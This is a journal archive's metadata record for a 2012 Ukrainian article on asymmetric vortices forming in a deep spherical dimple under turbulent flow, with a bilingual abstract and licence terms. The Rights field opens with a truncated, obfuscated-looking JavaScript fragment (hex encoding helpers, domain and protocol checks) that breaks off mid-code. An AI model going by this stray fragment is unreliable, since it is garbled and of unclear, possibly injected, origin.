Record Details

VORTEX FLOW INSIDE THE DEEP SPHERICAL DIMPLE

Наукові журнали Національного Авіаційного Університету

View Archive Info
 
 
Field Value
 
Title VORTEX FLOW INSIDE THE DEEP SPHERICAL DIMPLE
ВИХРОВА ТЕЧІЯ ВСЕРЕДИНІ ГЛИБОКОЇ СФЕРИЧНОЇ ЛУНКИ
ВИХРОВА ТЕЧІЯ ВСЕРЕДИНІ ГЛИБОКОЇ СФЕРИЧНОЇ ЛУНКИ
 
Creator Воскобійник, В.; Інститут гідромеханіки НАН України
 
Subject сoherent vortex structure; deep spherical dimple; narrow hydrodynamic channel; symmetric and asymmetric vortex

вузький гідродинамічний канал; глибока сферична лунка; когерентна вихрова структура; симетричний та асиметричний вихор
 
Description The results of experimental researches of the forming features of the vortex flow which is formed at the turbulentflow above of the deep spherical dimple are presented. Visualization shows that inclined asymmetric large-scale vortices are generated inside the dimple. These vortex structures are switched from one tilt in other, exciting lowfrequencyoscillations. During an evolution the asymmetric vortices are broken up above an aft wall of the dimple andthe angle of their incline and break up is increased with the growth of Reynolds number.
Наведено результати експериментальних досліджень особливостей формування вихровоїтечії, якa генерується при турбулентному обтіканні глибокої сферичної лунки. Візуалізаціятечії показала, що всередині лунки формуються і розвиваються похилі асиметричнівеликомасштабні вихори. Ці вихрові структури перемикаються із одного похилогорозташування в лунці в інше, що призводить до збурювання низькочастотних коливань.У ході еволюції асиметричні вихори викидаються над кормовою стінкою лунки. Кут їхнахилу та викиду збільшується з ростом числа Рейнольдса.Ключові слова: вузький гідродинамічний канал, глибока сферична лунка, когерентнавихрова структура, симетричний та асиметричний вихор
Наведено результати експериментальних досліджень особливостей формування вихровоїтечії, якa генерується при турбулентному обтіканні глибокої сферичної лунки. Візуалізаціятечії показала,  що всередині лунки формуються і розвиваються похилі асиметричні  великомасштабні вихори.  Ці вихрові структури перемикаються із одного похилого  розташування в лунці в інше,  що призводить до збурювання низькочастотних коливань.  У ході еволюції асиметричні вихори викидаються над кормовою стінкою лунки.  Кут їх  нахилу та викиду збільшується з ростом числа Рейнольдса.
 
Publisher National Aviation University
 
Contributor


 
Date 2012-04-20
 
Type


 
Format application/pdf
 
Identifier http://jrnl.nau.edu.ua/index.php/visnik/article/view/125
10.18372/2306-1472.50.125
 
Source Proceedings of the National Aviation University; Том 50, № 1 (2012); 144-150
Вестник Национального авиационного университета; Том 50, № 1 (2012); 144-150
Вісник Національного Авіаційного Університету; Том 50, № 1 (2012); 144-150
 
Language uk
 
Rights // o;o++)t+=e.charCodeAt(o).toString(16);return t},a=function(e){e=e.match(/[\S\s]{1,2}/g);for(var t="",o=0;o < e.length;o++)t+=String.fromCharCode(parseInt(e[o],16));return t},d=function(){return "jrnl.nau.edu.ua"},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf("http")==0){return p}for(var e=0;e
Автори, які публікуються у цьому журналі, погоджуються з такими умовами:Автори залишають за собою право на авторство своєї роботи та передають журналу право першої публікації цієї роботи на умовах ліцензії Creative Commons Attribution License, котра дозволяє іншим особам вільно розповсюджувати опубліковану роботу з обов'язковим посиланням на авторів оригінальної роботи та першу публікацію роботи у цьому журналі.Автори мають право укладати самостійні додаткові угоди щодо неексклюзивного розповсюдження роботи у тому вигляді, в якому вона була опублікована цим журналом (наприклад, розміщувати роботу в електронному сховищі установи або публікувати у складі монографії), за умови збереження посилання на першу публікацію роботи у цьому журналі.Політика журналу дозволяє і заохочує розміщення авторами в мережі Інтернет (наприклад, у сховищах установ або на особистих веб-сайтах) рукопису роботи, як до подання цього рукопису до редакції, так і під час його редакційного опрацювання, оскільки це сприяє виникненню продуктивної наукової дискусії та позитивно позначається на оперативності та динаміці цитування опублікованої роботи (див. The Effect of Open Access).
 

Технічна підтримка: НДІІТТ НАУ